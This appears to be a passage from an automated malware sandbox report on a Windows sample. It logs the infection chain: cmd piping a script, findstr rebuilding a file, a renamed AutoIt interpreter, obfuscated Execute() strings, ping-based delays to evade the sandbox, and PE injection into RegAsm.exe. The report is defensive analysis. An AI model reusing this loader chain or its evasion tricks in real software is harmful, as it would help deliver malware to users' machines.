              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Uses ping.exe to sleep
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeMemory allocated: 24C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeMemory allocated: 26C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeMemory allocated: 46C0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-99113
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comAPI coverage: 4.1 %
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe TID: 5888Thread sleep count: 153 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe TID: 5888Thread sleep time: -153000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_00402F3A FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402F3A
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_004033DB GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_004033DB
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3494A GetFileAttributesW,FindFirstFileW,FindClose,6_2_00C3494A
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C34005
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C3C2FF
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_00C3CD9F
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3CD14 FindFirstFileW,FindClose,6_2_00C3CD14
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C3F5D8
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C3F735
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C3FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C3FA36
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C33CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C33CE2
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BE5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00BE5D13
              Source: Appartenga.exe.com, 00000008.00000002.2429954439.000000000417B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
              Source: Appartenga.exe.com, 00000006.00000003.2046288433.00000000012C2000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2042438537.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2041227761.000000000129C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2045392622.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2040431129.000000000125C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2046762429.00000000012C4000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2047418349.000000000136C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2045016597.00000000012B4000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2046889192.000000000134E000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2040082700.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $iWPYDCUWifJqEMu = Execute(REYmrhU("84*117*115*106*111*104*74*116*71*109*112*98*117*41*40*83*79*107*71*78*105*87*119*100*40*42",1)), $bVyYdZvkAsaUzs = 'NATPSTJcUrldVWQDZ':
              Source: Appartenga.exe.com, 00000008.00000003.2420974799.0000000004031000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2421174177.0000000004040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IWPYDCUWIFJQEMUh
              Source: Appartenga.exe.com, 00000008.00000003.2419544914.000000000171C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2419320742.000000000171A000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2419141655.0000000001711000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2418243144.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2418835029.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2420023064.0000000001749000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $iWPYDCUWifJqEMu = Execute(REYmrhU("84*117*115*106*111*104*74*116*71*109*112*98*117*41*40*83*79*107*71*78*105*87*119*100*40*42",1)), $bVyYdZvkAsaUzs = 'NATPSTJcUrldVWQDZ'IH'%
              Source: Appartenga.exe.com, 00000006.00000003.2050638868.0000000003A4E000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2050890984.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2051031560.0000000003A65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IWPYDCUWIFJQEMU_
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002BF9000.00000004.00000020.00020000.00000000.sdmp, Chirurgo.adt.0.dr, S.4.drBinary or memory string: $iWPYDCUWifJqEMu = Execute(REYmrhU("84*117*115*106*111*104*74*116*71*109*112*98*117*41*40*83*79*107*71*78*105*87*119*100*40*42",1)), $bVyYdZvkAsaUzs = 'NATPSTJcUrldVWQDZ'
              Source: Appartenga.exe.com, 00000006.00000003.2050638868.0000000003A4E000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2050890984.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2051031560.0000000003A65000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2420974799.0000000004031000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000008.00000003.2421174177.0000000004040000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IWPYDCUWIFJQEMU
              Source: RegAsm.exe, 0000000A.00000002.3266824842.00000000009B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002BF9000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2046288433.00000000012C2000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2042438537.00000000012A6000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2048915181.00000000013FC000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2041227761.000000000129C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2045392622.00000000012C1000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2040431129.000000000125C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2046762429.00000000012C4000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2047418349.000000000136C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000003.2045016597.00000000012B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Local $iWPYDCUWifJqEMu = Execute(REYmrhU("74*89*112*102*42*54*55*43",2))
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C445D5 BlockInput,6_2_00C445D5
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00BE5240
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C05CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_00C05CAC
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_0040238C LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040238C
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,6_2_00C288CD
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00BFA385
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BFA354 SetUnhandledExceptionFilter,6_2_00BFA354
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects a PE file into a foreign processes
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comMemory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe base: 720000 value starts with: 4D5AJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comMemory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe base: 720000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comMemory written: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe base: 444000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C29369 LogonUserW,6_2_00C29369
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00BE5240
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C31AC6 SendInput,keybd_event,6_2_00C31AC6
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C351E2 mouse_event,6_2_00C351E2
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cmd < Ideale.adtJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmdJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V /R "^DzqZaKuCSEcQYFcSDUTCtNHXVpartBbUtTqjUWbpOSHHtRSBbGNtGZbQLrtosenduBMyFpYHvKOjuZSrsQGbOagtclAQSgSLxsADyMWgIuHVkkJLlqRAcq$" San.adt Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.com Appartenga.exe.com SJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,6_2_00C288CD
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_0040246B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040246B
              Source: 2YLM6BQ9S3.exe, 00000000.00000003.2028057381.0000000003273000.00000004.00001000.00020000.00000000.sdmp, 2YLM6BQ9S3.exe, 00000000.00000003.2027566248.0000000002D9C000.00000004.00000020.00020000.00000000.sdmp, Appartenga.exe.com, 00000006.00000002.2064869478.0000000000C86000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
              Source: Appartenga.exe.comBinary or memory string: Shell_TrayWnd
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00BF885B cpuid 6_2_00BF885B
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_004021A4
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_0040181E ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_0040181E
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C10722 GetUserNameW,6_2_00C10722
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Appartenga.exe.comCode function: 6_2_00C0416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,6_2_00C0416A
              Source: C:\Users\user\Desktop\2YLM6BQ9S3.exeCode function: 0_2_00405782 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@